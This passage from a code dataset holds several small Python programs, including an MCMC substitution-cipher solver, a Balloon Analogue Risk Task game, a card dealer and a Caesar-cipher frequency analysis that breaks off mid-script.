print(walkDistance)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SKajiwara/Jan2.2021.OneKattisADayChallenge","sub_path":"Parking/parking.py","file_name":"parking.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11383150235","text":"'''\nDiagnosing Colorectal Polyps in the Wild with Capsule Networks (D-Caps)\nOriginal Paper by Rodney LaLonde, Pujan Kandel, Concetto Spampinato, Michael B. Wallace, and Ulas Bagci\nPaper published at ISBI 2020: arXiv version (https://arxiv.org/abs/2001.03305)\nCode written by: Rodney LaLonde\nIf you use significant portions of this code or the ideas from our paper, please cite it :)\nIf you have any questions, please email me at lalonde@knights.ucf.edu.\n\nThis file is used for manipulating the vectors of the final layer of capsules (the D-Caps or diagnosis capsules).\nThis manipulation attempts to show what each dimension of these final vectors are storing (paying attention to),\nin terms of information about the positive input class.\nPlease see the README for further details about how to use this file.\n'''\n\nfrom __future__ import print_function\n\nimport os\nimport math\n\nimport SimpleITK as sitk\nfrom tqdm import tqdm, trange\nfrom PIL import Image\nimport numpy as np\nfrom keras import backend as K\nK.set_image_data_format('channels_last')\n\nfrom utils import safe_mkdir\nfrom model_helper import compile_model\n\n\ndef combine_images(generated_images, height=None, width=None):\n num = generated_images.shape[0]\n if width is None and height is None:\n width = int(math.sqrt(num))\n height = int(math.ceil(float(num)/width))\n elif width is not None and height is None: # height not given\n height = int(math.ceil(float(num)/width))\n elif height is not None and width is None: # width not given\n width = int(math.ceil(float(num)/height))\n\n shape = generated_images.shape[1:3]\n image = np.zeros((height*shape[0], width*shape[1]),\n dtype=generated_images.dtype)\n for index, img in enumerate(generated_images):\n i = int(index/width)\n j = index % width\n image[i*shape[0]:(i+1)*shape[0], j*shape[1]:(j+1)*shape[1]] = \\\n img[:, :, 0]\n return image\n\n\ndef manip(args, test_list, u_model):\n if args.test_weights_path == '':\n weights_path = os.path.join(args.check_dir, args.output_name + '_model_' + args.time + '.hdf5')\n else:\n weights_path = 
os.path.join(args.data_root_dir, args.test_weights_path)\n\n output_dir = os.path.join(args.data_root_dir, 'results', args.net)\n manip_out_dir = os.path.join(output_dir, 'manip_output')\n try:\n safe_mkdir(manip_out_dir)\n except:\n pass\n\n # Compile the loaded model\n manip_model = compile_model(args=args, uncomp_model=u_model)\n\n try:\n manip_model.load_weights(weights_path)\n except:\n raise NotImplementedError('Unable to find weights path.')\n\n\n # Manipulating capsule vectors\n print('Testing... This will take some time...')\n\n for i, img in enumerate(tqdm(test_list)):\n sitk_img = sitk.ReadImage(os.path.join(args.data_root_dir, 'imgs', img[0]))\n img_data = sitk.GetArrayFromImage(sitk_img)\n num_slices = img_data.shape[0]\n sitk_mask = sitk.ReadImage(os.path.join(args.data_root_dir, 'masks', img[0]))\n gt_data = sitk.GetArrayFromImage(sitk_mask)\n\n x, y = img_data[num_slices//2, :, :], gt_data[num_slices//2, :, :]\n x, y = np.expand_dims(np.expand_dims(x, -1), 0), np.expand_dims(np.expand_dims(y, -1), 0)\n\n noise = np.zeros([1, 512, 512, 1, 16])\n x_recons = []\n for dim in trange(16):\n for r in [-0.25, -0.125, 0, 0.125, 0.25]:\n tmp = np.copy(noise)\n tmp[:, :, :, :, dim] = r\n x_recon = manip_model.predict([x, y, tmp])\n x_recons.append(x_recon)\n\n x_recons = np.concatenate(x_recons)\n\n out_img = combine_images(x_recons, height=16)\n out_image = out_img * 4096\n out_image[out_image > 574] = 574\n out_image = out_image / 574 * 255\n\n Image.fromarray(out_image.astype(np.uint8)).save(os.path.join(manip_out_dir, img[0][:-4] + '_manip_output.png'))\n\n print('Done.')\n","repo_name":"lalonderodney/D-Caps","sub_path":"manip.py","file_name":"manip.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"36293168936","text":"import pygame\nimport math\n\ndef main():\n pygame.init()\n screen = pygame.display.set_mode((640, 480))\n baseLayer = pygame.Surface((640, 480))\n clock = pygame.time.Clock()\n screen.fill((0, 0, 0))\n\n isMouseDown = False\n prevX = -1\n prevY = -1\n currentX = -1\n currentY = -1\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1: \n isMouseDown = True\n currentX = event.pos[0]\n currentY = event.pos[1] \n prevX = event.pos[0]\n prevY = event.pos[1]\n\n if event.type == pygame.MOUSEBUTTONUP:\n if isMouseDown:\n isMouseDown = False\n baseLayer.blit(screen, (0, 0))\n\n if event.type == pygame.MOUSEMOTION:\n if isMouseDown:\n currentX = event.pos[0]\n currentY = event.pos[1]\n\n if isMouseDown and prevX != -1 and prevY != -1 and currentX != -1 and currentY != -1:\n screen.blit(baseLayer, (0, 0))\n center_x, center_y = calculateCenter(prevX, prevY, currentX, currentY)\n radius = math.sqrt((currentX-prevX)**2 + (currentY-prevY)**2)\n pygame.draw.polygon(screen, (255, 255, 255), [(center_x, center_y - radius), (center_x - math.sqrt(3)/2 * radius, center_y + radius/2), (center_x + math.sqrt(3)/2 * radius, center_y + radius/2)], 1)\n\n pygame.display.flip()\n clock.tick(60)\n\ndef calculateCenter(x1, y1, x2, y2):\n center_x = (x1 + x2) / 2\n center_y = (y1 + y2) / 2\n return center_x, center_y\n\nmain()\n","repo_name":"alikhanmurat/PP2","sub_path":"Lab9/Paint/eq. triangle.py","file_name":"eq. 
triangle.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16758235452","text":"import sys\n\n\ndef leftover():\n list = []\n for i in range(10):\n n = int(sys.stdin.readline().strip())\n list.append(n)\n s1 = set()\n for i in list:\n s1.add(i % 42)\n\n print(len(s1))\n\nleftover()","repo_name":"good5229/python-practice","sub_path":"3052.py","file_name":"3052.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36800403246","text":"import math\nimport json\nimport random\nfrom pathlib import Path\nfrom typing import Tuple\nimport cipher\nfrom custom_types import CountDict\nimport adjacent_letters\nimport alphabets\n\n\ndef load_json_from_file(filename: Path) -> CountDict:\n with open(filename) as f:\n content = f.read()\n stats = json.loads(content)\n return stats\n\n\nclass SubstitutionCipherMCMC:\n \"\"\"Provide class for performing decryption using MCMC with Metropolis-Hastings algorithm.\"\"\"\n\n def __init__(self, language_code):\n self.alphabets = alphabets.get(language_code)\n self.stats: CountDict = load_json_from_file(\n f\"letter_counts_{language_code}.json\"\n )\n\n def get_cipher_score(self, encrypted_text: str, cipher_text: str) -> float:\n \"\"\"Apply the cipher to the encrypted text and compute the probability of the\n decrypted text, given alphabet and statistics per defined language.\n\n Returns:\n float: Score, that is, unnormalized log probability of the decrypted text given certain\n language.\n \"\"\"\n decrypted_text = cipher.apply(encrypted_text, cipher_text, self.alphabets)\n counts_dict = adjacent_letters.get_count(decrypted_text, self.alphabets)\n score = 0.0\n for k, v in counts_dict.items():\n if k in self.stats:\n score += v * math.log(self.stats[k])\n return score\n\n def get_new_cipher_proposal(self, cipher_text: str) -> str:\n \"\"\"Propose a new cipher by switching the positions of two random letters in the cipher.\n\n Args:\n cipher_text (str): Cipher as a string.\n\n Returns:\n str: New cipher.\n \"\"\"\n cipher = list(cipher_text)\n pos1 = random.randint(0, len(cipher) - 1)\n pos2 = random.randint(0, len(cipher) - 1)\n if pos1 == pos2:\n return self.get_new_cipher_proposal(cipher_text)\n else:\n pos1_alpha = cipher[pos1]\n pos2_alpha = cipher[pos2]\n cipher[pos1] = pos2_alpha\n cipher[pos2] = pos1_alpha\n\n return \"\".join(cipher)\n\n def random_coin(self, p: float) -> bool:\n \"\"\"Toss a coin with probability of heads being p\"\"\"\n unif = random.uniform(0, 1)\n if unif >= p:\n return False\n else:\n return True\n\n def MCMC(\n self, encrypted_text: str, init: str, iters: int, logging: int = 500\n ) -> Tuple[str, float]:\n \"\"\"Try to decrypt encrypted text with metropolis-hastings algorithm.\n\n Args:\n encrypted_text (str): Text to decrypt.\n init (str): Initial cipher for the algorithm.\n iters (int): Number of iterations/samples.\n logging (int, optional): Display logging information every n iterations where\n logging specifies n.\n\n Returns:\n Tuple[str, float]: The most probable cipher, acceptance rate of the sampler.\n \"\"\"\n current_cipher = init\n best_cipher = init\n max_score = 0.0\n accepted = 0\n for i in range(iters):\n cipher_proposal = self.get_new_cipher_proposal(current_cipher)\n score_current_cipher = self.get_cipher_score(encrypted_text, current_cipher)\n score_proposed_cipher = self.get_cipher_score(\n encrypted_text, 
cipher_proposal\n )\n try:\n acceptance_probability = min(\n 1, math.exp(score_proposed_cipher - score_current_cipher)\n )\n except OverflowError:\n acceptance_probability = 1\n\n if score_current_cipher > max_score:\n best_cipher = current_cipher\n max_score = score_current_cipher\n if self.random_coin(acceptance_probability):\n current_cipher = cipher_proposal\n accepted += 1\n if logging and i % logging == 0:\n msg = self.log(encrypted_text, i, best_cipher, accepted)\n print(msg)\n return best_cipher, accepted / iters\n\n def log(self, encrypted_text, i, best_cipher, accepted):\n log_info = f\"Iteration: {i}\\nDecrypted text with best cipher so far: {cipher.apply(encrypted_text, best_cipher, self.alphabets)[0:60]}\\n\"\n if i > 0:\n log_info += f\"accept rate: {accepted/i:.2f}\\n\"\n return log_info\n","repo_name":"jjaakko/MCMC_cipher","sub_path":"MCMC.py","file_name":"MCMC.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45735055328","text":"#!/usr/bin/env python3\n\nimport random\nimport argparse\n\nclass Deck:\n suit_names = [\"Clubs\", \"Diamonds\", \"Hearts\", \"Spades\"]\n rank_names = [None, \"Ace\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\",\n \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\"]\n\n def __init__(self, n_cards = 52):\n self.deck = []\n while len(self.deck) < n_cards:\n for suit in range(4):\n for rank in range(1, 14):\n self.deck.append(Deck.rank_names[rank] + Deck.suit_names[suit])\n self.deck.append\n\n def shuffle(self):\n random.shuffle(self.deck)\n\n def deal_one_hand(self, n_cards = 5):\n hand = []\n for x in range(min(len(self.deck), n_cards)):\n hand.append(self.deck.pop()) \n return hand\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=\"Deal card from deck of 52 cards\")\n parser.add_argument('--hands', type=int, help='number of hands to deal [1]', default = 1)\n parser.add_argument('--cards', type=int, help='cards per hand [5]', default = 5)\n\n cmdargs = parser.parse_args()\n hands = cmdargs.hands\n cards = cmdargs.cards\n\n deck = Deck()\n deck.shuffle()\n for hand in range(hands):\n print(deck.deal_one_hand(cards))\n","repo_name":"jreisinger/varia","sub_path":"deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39212066326","text":"#!/usr/bin/python\n# encoding: utf-8\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport time\n\nfrom workflow import Workflow3\nimport i18n\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef parseTime(time):\n if time.isdigit():\n return \" \".join([time, i18n.dic['SECONDS']])\n\n table = {\n 's': i18n.dic['SECONDS'],\n 'sec': i18n.dic['SECONDS'],\n 'secs': i18n.dic['SECONDS'],\n 'second': i18n.dic['SECONDS'],\n 'seconds': i18n.dic['SECONDS'],\n 'm': i18n.dic['MINUTES'],\n 'min': i18n.dic['MINUTES'],\n 'mins': i18n.dic['MINUTES'],\n 'minute': i18n.dic['MINUTES'],\n 'minutes': i18n.dic['MINUTES'],\n 'h': i18n.dic['HOURS'],\n 'hour': i18n.dic['HOURS'],\n 'hours': i18n.dic['HOURS']\n }\n\n for expr in table:\n if time.endswith(expr):\n firstPart = time[:-(len(expr))]\n if firstPart.isdigit():\n return \" \".join([firstPart, table[expr]])\n\n return \"\"\n\ndef main(wffff):\n time_str = \"\"\n message = \"Time's up!\"\n\n if len(wf.args) == 0:\n wf.add_item(title = i18n.dic['TITLE_DEFAULT'], subtitle = i18n.dic['SUBTITLE_DEFAULT'], valid = True)\n 
else:\n time_str = parseTime(wf.args[0].strip())\n\n if len(wf.args) > 1:\n message = \" \".join(wf.args[1:])\n\n if len(time_str) > 0:\n wf.add_item(\n title = i18n.dic['TITLE_INPUT_DEFAULT'] % time_str,\n subtitle = i18n.dic['SUBTITLE_INPUT_DEFAULT'] % message,\n arg = ' '.join(wf.args),\n valid = True)\n else:\n wf.add_item(title = i18n.dic['ERR_TITLE_DEFAULT'], subtitle = i18n.dic['ERR_SUBTITLE_DEFAULT'], valid = True)\n\n wf.send_feedback()\n\nif __name__ == '__main__':\n wf = Workflow3()\n sys.exit(wf.run(main))","repo_name":"luoweihua7/timer-workflow","sub_path":"src/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12219653999","text":"import random\nimport tkinter as tk\nfrom PIL import Image, ImageTk\n#import winsound\nimport time\nfrom playsound import playsound\nimport sys\nfrom tkinter import ttk\n\n\nclass BalloonAnalogueRiskTask:\n def __init__(self, master, user):\n self.master = master\n self.user = user\n # setup game relevant data\n self.print_to_console = True\n self.csv_file = open(\"log.csv\", \"a+\", buffering=1)\n self.csv_file.write(f\"timestamp, user, event, nr_ballons, pumps, overall_money, pump_probability, burst_chance\\n\")\n self.score = 0\n self.pumps = 0\n self.nr_balloons = 30\n self.max_pumps = 50 # maximum number of pumps\n self.game_over = False\n self.start_budget = 1500 #initial money\n self.budget = 1500 - 50 #current money\n self.pump_embursment_sum = 0 # temp variable to store the embursment sum\n self.pump_embursment = 1 #how much is added for each pump\n self.punishment = 50 #how much money is substracted for each balloon\n self.budget = self.start_budget - self.punishment #current money\n \n # get height and width of current window\n self.width = self.master.winfo_screenwidth()\n self.height = self.master.winfo_screenheight()\n # create the frame for the ballon: \n self.ballon_frame_w = self.width*0.7\n self.ballon_frame_h = self.height*0.7\n self.ballon_frame = tk.Frame(self.master, width=self.ballon_frame_w, height=self.ballon_frame_h)\n self.ballon_frame.configure(bg='white') \n # create the frame for the button\n self.button_frame_w = self.ballon_frame_w\n self.button_frame_h = self.height*0.3\n self.button_frame = tk.Frame(self.master, width=self.button_frame_w, height=self.button_frame_h) \n # create the frame for the bar\n self.bar_frame_w = self.width*0.2\n self.bar_frame_h = self.ballon_frame_h\n self.bar_frame = tk.Frame(self.master, width=self.bar_frame_w, height=self.bar_frame_h)\n \n self.title_frame = tk.Frame(self.master, width=self.width, height=self.height*0.2)\n self.title_frame.grid(row=0, column=1)\n \n self.left_buffer_frame = tk.Frame(self.master)\n \n self.bar_frame.grid(row=1, column=0)\n self.ballon_frame.grid(row=1, column=1)\n self.button_frame.grid(row=2, column=1)\n self.left_buffer_frame.grid(row=1, column=2)\n \n #self.title_frame = tk.Frame(self.master, width=self.width, height=self.height*0.2)\n #elf.title_canvas = tk.Canvas(self.title_frame, width=self.width, height=self.height*0.2)\n #self.title_canvas.pack()\n #self.title_frame.grid(row=0, column=0)\n #self.max_money_label = tk.Label(self.title_frame, text=\"Max Money: 1500\", font=(\"Arial\", 12))\n #self.max_money_label.grid(row=0, column=0, pady=10)\n #self.max_money_label.config(text=\"Max Money: {}\".format(self.start_budget))\n #self.title_label = tk.Label(self.title_frame, text=\"Balloon Game\", font=(\"Arial\", 12))\n 
\n #self.title_label.grid(row=0, column=0)\n \n # setup the title\n self.title_canvas = tk.Canvas(self.title_frame, width=self.ballon_frame_w, height=self.height*0.1)\n self.title_canvas.pack()\n self.score_label = tk.Label(self.title_canvas, text=\"Score: 0\", font=(\"Arial\", 12))\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.title_canvas.create_window(100, 100, window=self.score_label) \n self.max_money_label = tk.Label(self.title_canvas, text=\"Max Money: 1500\", font=(\"Arial\", 12))\n self.max_money_label.config(text=\"Max Money: {}\".format(self.start_budget))\n self.title_canvas.create_window(300, 100, window=self.max_money_label) \n self.tries_label = tk.Label(self.title_canvas, text=\"Balloons Left: {}\".format(self.nr_balloons), font=(\"Arial\", 12))\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n self.title_canvas.create_window(500, 100, window=self.tries_label) \n self.pumps_label = tk.Label(self.title_canvas, text=\"Pumps: 0\", font=(\"Arial\", 12))\n self.title_canvas.create_window(700, 100, window=self.pumps_label) \n \n # setup the buttons \n self.button_canvas = tk.Canvas(self.button_frame, width=self.button_frame_w, height=self.button_frame_h)\n self.button_canvas.pack()\n self.pump_button = tk.Button(self.button_frame, text=\"Pump\", font=\"Helvetica 20 bold\", command=self.pump)\n self.button_canvas.create_window(self.button_frame_w*0.1, self.button_frame_h*0.08, window=self.pump_button)\n self.checkout_button = tk.Button(self.button_frame, text=\"Collect CHF\", font=\"Helvetica 20 bold\", command=self.checkout)\n self.button_canvas.create_window(self.button_frame_w*0.9, self.button_frame_h*0.08, window=self.checkout_button)\n \n \n \"\"\"\n self.score_label = tk.Label(self.button_frame, text=\"Score: 0\", font=(\"Arial\", 12))\n self.score_label.grid(row=1, column=0, pady=10)\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n \n self.max_money_label = tk.Label(self.button_frame, text=\"Max Money: 1500\", font=(\"Arial\", 12))\n self.max_money_label.grid(row=0, column=0, pady=10)\n self.max_money_label.config(text=\"Max Money: {}\".format(self.start_budget))\n \n self.tries_label = tk.Label(self.button_frame, text=\"Balloons Left: {}\".format(self.nr_balloons), font=(\"Arial\", 12))\n self.tries_label.grid(row=1, column=1, pady=10)\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n\n self.pumps_label = tk.Label(self.button_frame, text=\"Pumps: 0\", font=(\"Arial\", 12))\n self.pumps_label.grid(row=2, column=0, pady=10)\n \n self.instructions = tk.Label(self.button_frame, text=\"Click the pump button to inflate the balloon\", font=(\"Arial\", 12))\n self.instructions.grid(row=3, column=0, pady=10)\n self.checkout_button = tk.Button(self.button_frame, text=\"Collect CHF\", font=(\"Arial\", 12), command=self.checkout)\n self.checkout_button.grid(row=4, column=1, pady=10)\n \"\"\"\n \n \n # setup the balloon\n self.ballon_background = tk.Canvas(self.ballon_frame, width=self.ballon_frame_w, height=self.ballon_frame_h, bg=\"white\")\n img = Image.open(\"balloon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1)\n hpercent = (self.img_baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(hpercent)))\n img = img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n #img.thumbnail((self.img_baseheight,self.img_baseheight), Image.Resampling.LANCZOS)\n #wpercent = (self.img_basewidth/float(img.size[0]))\n #hsize = 
int((float(img.size[1])*float(wpercent)))\n #img = img.resize((self.img_basewidth,hsize), Image.Resampling.LANCZOS)\n self.balloon_image = ImageTk.PhotoImage(img)\n self.balloon_label = tk.Label(self.ballon_frame, image=self.balloon_image, borderwidth=0)\n self.balloon_label.grid(row=0, column=0, padx=20)\n self.ballon_background.grid(row=0, column=0)\n \n # setup the moving bar\n self.bar = tk.Canvas(self.bar_frame, width=self.bar_frame_w, height=self.bar_frame_h)\n self.bar.pack()\n self.bar.create_rectangle(self.bar_frame_w*0.4, 0.1*self.bar_frame_h, 0.6*self.bar_frame_w, 0.9*self.bar_frame_h, fill=\"white\", outline=\"black\")\n self.moving_bar = self.bar.create_rectangle(self.bar_frame_w*0.4, 0.0*self.bar_frame_h, 0.6*self.bar_frame_w, 0.0*self.bar_frame_h, fill=\"light blue\")\n self.bar.tag_raise(self.moving_bar)\n # to move the bar up (self.bar_frame_w*0.6, 0.1*self.bar_frame_h, 0.4*self.bar_frame_w, self.bar_frame_h) => bar is at the top\n # bar at the bottom: (self.bar_frame_w*0.4, 0.1*self.bar_frame_h, 0.6*self.bar_frame_w, 0.1*self.bar_frame_h) => bar is at bottom\n self.moving_bar_h = 0.9*self.bar_frame_h\n self.bar.coords(self.moving_bar, (self.bar_frame_w*0.4, 0.9*self.bar_frame_h, 0.6*self.bar_frame_w, 0.9*self.bar_frame_h))\n self.pump_dist = (0.9*self.bar_frame_h - 0.1*self.bar_frame_h)/50\n self.bar.create_text(0.5*self.bar_frame_w, 0.05*self.bar_frame_h, text=\"Potential Losses for this Balloon\", fill=\"black\", font=('Helvetica 12 bold'))\n self.bar.create_text(0.5*self.bar_frame_w, 0.08*self.bar_frame_h, text=\"(-50 to 0)\", fill=\"black\", font=('Helvetica 12 bold'))\n self.moving_bar_text = self.bar.create_text(0.3*self.bar_frame_w, 0.9*self.bar_frame_h, text=f\"{-self.punishment}\", fill=\"black\", font=('Helvetica 12 bold'))\n #self.bar_title = tk.Label(self.bar, text=\"Potential Losses for this Balloon\", font=(\"Arial\", 14))\n #self.bar_title.grid(row=0, column=0)\n self.log_csv(\"game_start\")\n \n def log(self, msg):\n if self.print_to_console:\n print(f\"[*] {msg}\")\n self.log_file.write(msg)\n self.log_file.flush()\n \n def log_csv(self, event, prob=\"\", burst_chance=\"\"):\n # timestamp, event, nr_ballons, pumps, overall_money, pump_probability, burst_chance\\n\n if self.print_to_console:\n print(f\"[*] {time.time()},{self.user},{event},{self.nr_balloons},{self.pumps},{self.budget},{prob},{burst_chance}\")\n self.csv_file.write(f\"{time.time()},{self.user},{event},{self.nr_balloons},{self.pumps},{self.budget},{prob},{burst_chance}\\n\") \n self.csv_file.flush()\n \n def burst_chance(self):\n return 1 / (self.max_pumps - self.pumps + 1)\n \n def pump_ballon(self):\n img = Image.open(\"balloon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1+(self.ballon_frame_h*0.8/self.max_pumps*self.pumps))\n hpercent = (self.img_baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(hpercent)))\n img = img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n self.balloon_image = ImageTk.PhotoImage(img)\n self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n \n def reset_ballon(self):\n img = Image.open(\"balloon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1)\n hpercent = (self.img_baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(hpercent)))\n img = img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n self.balloon_image = ImageTk.PhotoImage(img)\n self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n \n def reset_bar(self, max_punish=False):\n 
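# Collapse the potential-loss bar back to empty; when the balloon bursts\n        # (max_punish=True) the label is pinned at the full -50 penalty, otherwise\n        # it shows the punishment offset by the pumps already banked.\n        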
self.bar.coords(self.moving_bar, (self.bar_frame_w*0.4, 0.0*self.bar_frame_h, 0.6*self.bar_frame_w, 0.0*self.bar_frame_h))\n self.bar.coords(self.moving_bar_text, (0.3*self.bar_frame_w, 0.9*self.bar_frame_h))\n if max_punish:\n self.bar.itemconfig(self.moving_bar_text, text=f\"{-self.punishment}\")\n else:\n self.bar.itemconfig(self.moving_bar_text, text=f\"{-self.punishment+self.pumps}\")\n \n def pump_bar(self):\n # min height = 0.1*self.bar_frame_h\n # max height = 0.9*self.bar_frame_h\n # 0.8*self.bar_frame_h / self.max_pumps * self.pumps\n self.bar.coords(self.moving_bar, (self.bar_frame_w*0.4, 0.9*self.bar_frame_h-(0.8*self.bar_frame_h / self.max_pumps * self.pumps), 0.6*self.bar_frame_w, 0.9*self.bar_frame_h))\n self.bar.coords(self.moving_bar_text, (0.3*self.bar_frame_w, 0.9*self.bar_frame_h-(0.8*self.bar_frame_h / self.max_pumps * self.pumps)))\n self.bar.itemconfig(self.moving_bar_text, text=f\"{-self.punishment+self.pumps}\")\n \n def checkout(self):\n self.log_csv(f\"checkout\")\n playsound('casino.wav', False)\n self.nr_balloons = self.nr_balloons - 1\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n if self.nr_balloons == 0:\n self.log_csv(f\"game over\")\n self.game_over = True\n self.pump_button.config(text=\"Game Over\", state=\"disabled\")\n self.checkout_button.config(text=\"Game Over\", state=\"disabled\")\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n else:\n self.pump_button.config(text=\"Checked Out\", state=\"disabled\")\n self.checkout_button.config(text=\"Checked Out\", state=\"disabled\")\n self.ballon_frame.after(1000, self.reset)\n #self.reset()\n \n def pump(self):\n if self.game_over:\n return\n \n #winsound.PlaySound(\"inflate.wav\", winsound.SND_ASYNC)\n playsound('inflate.wav', False)\n # TODO: implement backup\n self.pumps += 1\n self.pump_embursment_sum += 1\n self.budget = self.budget + self.pump_embursment\n self.pumps_label.config(text=\"Pumps: {}\".format(self.pumps))\n \n prob = random.random()\n b_chance = self.burst_chance()\n burst = prob < b_chance\n self.log_csv(f\"ballon pumped\", prob=prob, burst_chance=b_chance)\n if burst:\n self.log_csv(f\"ballon burst\", prob=prob, burst_chance=b_chance)\n self.reset_bar(max_punish=True)\n playsound('explosion.wav', False)\n popped_img = Image.open(\"poppedballoon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1+(self.ballon_frame_h*0.8/self.max_pumps*self.pumps))\n hpercent = (self.img_baseheight/float(popped_img.size[1]))\n wsize = int((float(popped_img.size[0])*float(hpercent)))\n popped_img = popped_img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n self.balloon_image = self.balloon_image = ImageTk.PhotoImage(popped_img)\n self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n self.budget = self.budget - self.pump_embursment_sum\n self.nr_balloons = self.nr_balloons - 1\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n if self.nr_balloons == 0:\n self.game_over = True\n self.log_csv(f\"game over\")\n self.pump_button.config(text=\"Game Over\", state=\"disabled\")\n self.checkout_button.config(text=\"Game Over\", state=\"disabled\")\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n else:\n #winsound.PlaySound(\"explosion.wav\", winsound.SND_ASYNC)\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.pump_button.config(text=\"Popped\", state=\"disabled\")\n 
self.checkout_button.config(text=\"Popped\", state=\"disabled\")\n self.ballon_frame.after(2000, self.reset)\n #self.pump_button.config(text=\"Game Over\", state=\"disabled\")\n else: \n self.pump_ballon()\n self.pump_bar()\n if self.pumps == self.max_pumps:\n self.log_csv(f\"max pumps reached\")\n self.checkout()\n else:\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n #self.balloon_image = ImageTk.PhotoImage(Image.open(\"balloon.jpg\").resize((int(100 * self.balloon_size), int(100 * self.balloon_size))))\n #self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n\n def reset(self):\n self.pumps = 0\n self.pump_embursment_sum = 0\n self.budget = self.budget - self.punishment\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.pumps_label.config(text=\"Pumps: {}\".format(self.pumps))\n #self.balloon_image = ImageTk.PhotoImage(Image.open(\"balloon.jpg\").resize((100, 100)))\n #self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n self.pump_button.config(text=\"Pump\", state=\"active\")\n self.checkout_button.config(text=\"Collect CHF\", state=\"active\")\n self.reset_bar()\n self.reset_ballon()\n self.log_csv(f\"new balloon\")\n\n \nuser = sys.argv[1]\nroot = tk.Tk()\n#root.configure(bg='white')\nroot.title('Ballon Game')\nscreenWidth = root.winfo_screenwidth()\nscreenHeight = root.winfo_screenheight() \nroot.minsize(width=screenWidth, height=screenHeight)\n#root.attributes('-fullscreen', True)\napp = BalloonAnalogueRiskTask(root, user)\nroot.mainloop()\n","repo_name":"philippmao/bart","sub_path":"BART.py","file_name":"BART.py","file_ext":"py","file_size_in_byte":16520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41429667290","text":"from collections import Counter\nimport matplotlib.pyplot as plt\n\nprobability={'a':.08167,'b':.01492,'c':.02782,'d':.04253,'e':.12702,'f':.02228,'g':.02015,\n 'h':.06094,'i':.06966,'j':0.00153,'k':0.00772,'l':.04025,'m':.02406,'n':.06749,\n 'o':.07507,'p':.01929,'q':0.00095,'r':.05987,'s':.06327,'t':.09056,'u':.02758,\n 'v':0.00978,'w':.02360,'x':0.00150,'y':.01974,'z':0.00074}\n\ndef distance(key, encrypted_str):\n squared_dist=0\n encrypted_string=''\n for i in range(len(encrypted_str)):\n encrypted_string+=chr(((ord(encrypted_str[i])-ord('a'))-key)%26+97)\n count = Counter(encrypted_string)\n encrypted_string=list(encrypted_string)\n text_length=len(encrypted_string)\n #unique characters\n encrypted_string=set(encrypted_string)\n unique_chars=len(encrypted_string)\n\n for i in range(unique_chars):\n chars = encrypted_string.pop()\n squared_dist+= (text_length * probability[chars] - count[chars]) ** 2\n return squared_dist\n\ndef Mapping(encrypted_org1):\n encrypted_string = ''\n for i in range(len(encrypted_org1)):\n if ord(encrypted_org1[i]) >= 97 and ord(encrypted_org1[i]) <= 122:\n encrypted_string = encrypted_string + chr(((ord(encrypted_org1[i]) - ord('a')) - shift_key) % 26 + 97)\n else:\n encrypted_string += encrypted_org1[i]\n return encrypted_string\n\n\nencrypted_file=open('ceaser_cipher.txt','r')\norginal_encrypted=encrypted_file.read().lower()\norg_encrypted_cpy=orginal_encrypted\norginal_encrypted=list(orginal_encrypted)\nstop_chars={' ', '.', ','}\norginal_encrypted = [element for element in orginal_encrypted if element not in stop_chars]\n\n#relative_frequency histogram of the 
